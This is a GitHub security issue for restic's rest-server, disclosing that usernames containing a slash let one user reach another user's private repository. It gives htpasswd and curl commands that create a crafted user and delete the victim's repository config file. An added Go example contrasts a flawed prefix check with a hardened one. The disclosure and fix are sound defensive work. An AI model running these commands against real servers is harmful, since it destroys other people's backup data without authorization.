restic / rest-server

Rest Server is a high performance HTTP server that implements restic's REST backend API.
BSD 2-Clause "Simplified" License

Security: Users with names containing "/" can access paths outside of their private repo #131

Closed juergenhoetzel closed 3 years ago

juergenhoetzel commented 3 years ago

Consider prefix user foo

htpasswd -c -B  -b /tmp/restic/.htpasswd foo password
restic -r rest:http://foo:password@localhost:8000/foo init

Create user (sharing the same prefix and separated by a slash) to access config file:

htpasswd  -B  -b /tmp/restic/.htpasswd foo/config attack

Delete config file in first user's repo using the second user's credentials:

curl -v  -X DELETE -u foo/config:attack  http://localhost:8000/foo/config
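The report above comes down to how the server decides that a request path belongs to the authenticated user. The following Go snippet is an added illustration written for this page, not rest-server's own code: `allowedPrefixCheck` reproduces the weak pattern (a plain string-prefix test, which lets a user named `foo/config` reach `/foo/config`, and incidentally also lets `foo` reach `/foobar/...`), and `allowedSegmentCheck` shows a hardened form that rejects usernames containing path separators, normalises the path, and requires the first path segment to equal the username exactly. All function names are hypothetical.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// Constructed example, not rest-server's code. In private-repos mode each
// user's repository lives under /<username>/; these functions model two ways
// of checking that a request path stays inside the caller's own prefix.

// allowedPrefixCheck is the weak pattern: a plain string-prefix test.
// A user named "foo/config" satisfies it for "/foo/config", so the request
// lands on a file inside user foo's repository. It also accepts "/foobar/..."
// for user "foo", since "/foobar" starts with "/foo".
func allowedPrefixCheck(username, reqPath string) bool {
	return strings.HasPrefix(reqPath, "/"+username)
}

// validUsername rejects names that could be read as path components:
// empty names, "." and "..", and anything containing a slash or backslash.
func validUsername(username string) bool {
	if username == "" || username == "." || username == ".." {
		return false
	}
	return !strings.ContainsAny(username, "/\\")
}

// allowedSegmentCheck is the hardened form: refuse suspicious usernames,
// normalise the path (collapsing ".." , "." and repeated slashes), split it
// into segments, and require the first segment to be exactly the username.
func allowedSegmentCheck(username, reqPath string) bool {
	if !validUsername(username) {
		return false
	}
	clean := path.Clean("/" + reqPath)
	segs := strings.Split(strings.TrimPrefix(clean, "/"), "/")
	return len(segs) > 0 && segs[0] == username
}

func main() {
	// Constructed cases: the scenario from the report plus two related ones.
	cases := []struct{ user, reqPath string }{
		{"foo", "/foo/config"},            // legitimate access to own repo
		{"foo/config", "/foo/config"},     // the slash-in-username case
		{"foo", "/foobar/config"},         // sibling prefix
		{"foo", "/foo/../bar/config"},     // traversal out of own prefix
	}
	for _, c := range cases {
		fmt.Printf("user=%-12q path=%-22q prefix=%-5v segment=%v\n",
			c.user, c.reqPath,
			allowedPrefixCheck(c.user, c.reqPath),
			allowedSegmentCheck(c.user, c.reqPath))
	}
}
```

Validating the username at account-creation time (the `htpasswd` step) is the simplest place to enforce this, but the server-side check still has to hold, since the credentials file is not under the server's control.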